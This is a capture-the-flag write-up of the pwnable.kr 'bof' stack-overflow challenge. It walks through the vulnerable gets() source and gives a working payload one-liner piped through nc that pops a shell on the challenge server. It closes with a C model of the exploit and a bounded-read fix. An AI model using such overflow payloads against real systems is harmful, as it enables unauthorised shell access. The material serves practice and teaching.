Pwnable.kr - bof

March 25 2017

Another of the early simple challenges. SSHing into the box gives the following source, bof.c:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

The idea of this challenge is to write past the bounds of the overflowme array and keep going until we reach the argument that main() passed to func(). gets() imposes no length limit, and the argument key was pushed onto the stack by the caller, so it sits at a higher address than the local buffer and a long enough input overwrites it. If we overwrite it with 0xcafebabe, the if(key == 0xcafebabe) comparison evaluates to true and we pop a shell.

Loading the binary in gdb and searching the stack for the 0xdeadbeef value showed that key sits 52 bytes past the start of overflowme: the 32-byte buffer plus whatever lies between it and the argument. So the payload is 52 bytes of filler followed by 0xcafebabe in little-endian byte order, \xbe\xba\xfe\xca. The trailing cat keeps stdin open after python exits, so the shell we pop actually receives the commands we type.

↳ (python -c "print 'A'*52 + '\xbe\xba\xfe\xca'"; cat) | nc pwnable.kr 9000 
ls 
bof 
bof.c 
flag 
log 
log2 
super.pl 
cat flag 
<redacted>

We pop a shell and read the flag!
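To make the offset reasoning above concrete without a 32-bit box at hand, here is an added C example, not part of the original writeup and not pwnable.kr's code. It models func()'s frame as a struct with key 52 bytes past overflowme (the 52 is taken from the 'A'*52 payload; what fills the 20-byte gap is an assumption), recreates the gdb step as a scan for the 0xdeadbeef marker, builds the little-endian payload, and delivers it both the way gets() does and the way a bounded fgets()-style read would. It also flags the one case the one-liner cannot handle: a target value containing a 0x0a byte, which gets() would treat as end of line.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Distance from the start of overflowme to key, from the writeup's 'A'*52 payload. */
#define KEY_OFFSET 52u

/* Stand-in for func()'s stack frame: overflowme first, key last. The contents of
 * the gap (compiler padding, saved ebp, return address) are an assumption here
 * and do not matter for the overwrite itself. */
struct frame_model {
    uint8_t  overflowme[32];
    uint8_t  gap[KEY_OFFSET - 32];
    uint32_t key;               /* the argument main() pushed for func() */
};
_Static_assert(offsetof(struct frame_model, key) == KEY_OFFSET,
               "model must place key 52 bytes past overflowme");

/* The gdb step: scan a byte image of the stack, starting at overflowme, for a
 * 32-bit little-endian marker and return its byte offset, or -1 if absent. */
long find_marker_offset(const uint8_t *stack, size_t len, uint32_t marker)
{
    for (size_t i = 0; i + 4 <= len; i++) {
        uint32_t v = (uint32_t)stack[i]
                   | (uint32_t)stack[i + 1] << 8
                   | (uint32_t)stack[i + 2] << 16
                   | (uint32_t)stack[i + 3] << 24;
        if (v == marker)
            return (long)i;
    }
    return -1;
}

/* offset bytes of filler followed by value in little-endian order. gets() stops
 * at '\n', so a value containing a 0x0a byte cannot be delivered this way;
 * return 0 to flag that instead of emitting a payload that would be truncated. */
size_t build_payload(uint8_t *out, size_t cap, size_t offset, uint32_t value)
{
    if (offset + 4 > cap)
        return 0;
    for (int shift = 0; shift < 32; shift += 8)
        if (((value >> shift) & 0xff) == '\n')
            return 0;
    memset(out, 'A', offset);
    for (int i = 0; i < 4; i++)
        out[offset + i] = (uint8_t)(value >> (8 * i));
    return offset + 4;
}

/* What gets() does: copy everything, however long, starting at overflowme.
 * Writing through the struct keeps the run past the array in bounds of the model. */
uint32_t smash(struct frame_model *f, const uint8_t *payload, size_t len)
{
    if (len > sizeof *f)
        len = sizeof *f;
    memcpy((uint8_t *)f, payload, len);
    return f->key;
}

/* The fix bof.c needs: a read bounded by sizeof overflowme, as fgets(buf, sizeof buf, stdin)
 * would be, can never reach key. */
uint32_t read_bounded(struct frame_model *f, const uint8_t *payload, size_t len)
{
    if (len > sizeof f->overflowme)
        len = sizeof f->overflowme;
    memcpy(f->overflowme, payload, len);
    return f->key;
}

/* Whole chain against the model: locate 0xdeadbeef, build the payload for
 * wanted_key, deliver it with reader, and return the key func() would compare. */
uint32_t run_model(uint32_t wanted_key,
                   uint32_t (*reader)(struct frame_model *, const uint8_t *, size_t))
{
    struct frame_model f;
    memset(&f, 0, sizeof f);
    f.key = 0xdeadbeef;

    uint8_t image[sizeof f];
    memcpy(image, &f, sizeof image);
    long off = find_marker_offset(image, sizeof image, 0xdeadbeef);
    if (off < 0)
        return 0;

    uint8_t payload[sizeof f];
    size_t n = build_payload(payload, sizeof payload, (size_t)off, wanted_key);
    if (n == 0)
        return 0;
    return reader(&f, payload, n);
}

int main(void)
{
    uint8_t payload[64];
    size_t n = build_payload(payload, sizeof payload, KEY_OFFSET, 0xcafebabe);
    printf("payload (%zu bytes):", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", payload[i]);
    printf("\nmodel key after gets():  0x%08x\n", run_model(0xcafebabe, smash));
    printf("model key after fgets(): 0x%08x\n", run_model(0xcafebabe, read_bounded));
    return 0;
}
```

Run it and the payload bytes end in be ba fe ca, exactly the string fed to nc above; the gets()-style delivery reports 0xcafebabe while the bounded read leaves 0xdeadbeef untouched. Passing 0xcafe0abe as the wanted key makes build_payload refuse, which is the check to run before blaming the offset when a payload like this mysteriously stops working.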
